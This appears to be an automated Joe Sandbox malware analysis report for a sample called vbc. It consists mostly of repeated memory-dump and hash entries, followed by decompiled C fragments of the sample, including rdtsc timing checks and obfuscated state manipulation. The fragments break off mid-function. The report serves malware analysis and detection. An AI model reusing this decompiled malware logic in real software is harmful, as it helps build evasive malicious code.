                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E00408ED0(intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				char _v24;
                                              				char _v284;
                                              				char _v804;
                                              				char _v840;
                                              				void* _t24;
                                              				void* _t31;
                                              				void* _t33;
                                              				void* _t34;
                                              				void* _t39;
                                              				void* _t50;
                                              				intOrPtr _t52;
                                              				void* _t53;
                                              				void* _t54;
                                              				void* _t55;
                                              				void* _t56;
                                              
                                              				_t52 = _a4;
                                              				_t39 = 0; // executed
                                              				_t24 = E00407210(_t52,  &_v24); // executed
                                              				_t54 = _t53 + 8;
                                              				if(_t24 != 0) {
                                              					E00407420( &_v24,  &_v840);
                                              					_t55 = _t54 + 8;
                                              					do {
                                              						E0041BF40( &_v284, 0x104);
                                              						E0041C5B0( &_v284,  &_v804);
                                              						_t56 = _t55 + 0x10;
                                              						_t50 = 0x4f;
                                              						while(1) {
                                              							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
                                              							_t56 = _t56 + 0x10;
                                              							if(_t31 != 0) {
                                              								break;
                                              							}
                                              							_t50 = _t50 + 1;
                                              							if(_t50 <= 0x62) {
                                              								continue;
                                              							} else {
                                              							}
                                              							goto L8;
                                              						}
                                              						_t9 = _t52 + 0x18; // 0x5e14c483
                                              						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
                                              						_t39 = 1;
                                              						L8:
                                              						_t33 = E00407450( &_v24,  &_v840);
                                              						_t55 = _t56 + 8;
                                              					} while (_t33 != 0 && _t39 == 0);
                                              					_t34 = E004074D0(_t52,  &_v24); // executed
                                              					if(_t39 == 0) {
                                              						asm("rdtsc");
                                              						asm("rdtsc");
                                              						_v8 = _t34 - 0 + _t34;
                                              						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
                                              					}
                                              					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
                                              					_t20 = _t52 + 0x35; // 0xffff43e8
                                              					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
                                              					return 1;
                                              				} else {
                                              					return _t24;
                                              				}
                                              			}



















                                              0x00408edb
                                              0x00408ee3
                                              0x00408ee5
                                              0x00408eea
                                              0x00408eef
                                              0x00408f02
                                              0x00408f07
                                              0x00408f10
                                              0x00408f1c
                                              0x00408f2f
                                              0x00408f34
                                              0x00408f37
                                              0x00408f40
                                              0x00408f52
                                              0x00408f57
                                              0x00408f5c
                                              0x00000000
                                              0x00000000
                                              0x00408f5e
                                              0x00408f62
                                              0x00000000
                                              0x00000000
                                              0x00408f64
                                              0x00000000
                                              0x00408f62
                                              0x00408f66
                                              0x00408f69
                                              0x00408f6f
                                              0x00408f71
                                              0x00408f7c
                                              0x00408f81
                                              0x00408f84
                                              0x00408f91
                                              0x00408f9c
                                              0x00408f9e
                                              0x00408fa4
                                              0x00408fa8
                                              0x00408fab
                                              0x00408fab
                                              0x00408fb2
                                              0x00408fb5
                                              0x00408fba
                                              0x00408fc7
                                              0x00408ef6
                                              0x00408ef6
                                              0x00408ef6

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
                                              • Instruction ID: cf0e5f29dbad696541b590ed4d5857ed9ac00164998f33992c9cd2087abb1f81
                                              • Opcode Fuzzy Hash: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
                                              • Instruction Fuzzy Hash: CD210CB2D4010957CB20D6749D42AFB73ACAB54314F44057FF989A3181FA387B8987A6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 195 407643-407649 196 407629-40763e 195->196 197 40764b-40764f 195->197 198 407651-40766d call 41b900 call 41b7b0 197->198 199 4076a7-4076ca call 415aa0 197->199 205 4076cc-4076de PostThreadMessageW 199->205 206 4076fe-407702 199->206 208 4076e0-4076fa call 4098a0 205->208 209 4076fd 205->209 208->209 209->206
                                              C-Code - Quality: 54%
                                              			E00407643(void* __ecx, void* __esi, void* __eflags) {
                                              
                                              				if(__eflags <= 0) {
                                              					asm("enter 0xc985, 0x74");
                                              					asm("adc [ecx+0x333333f9], eax");
                                              				} else {
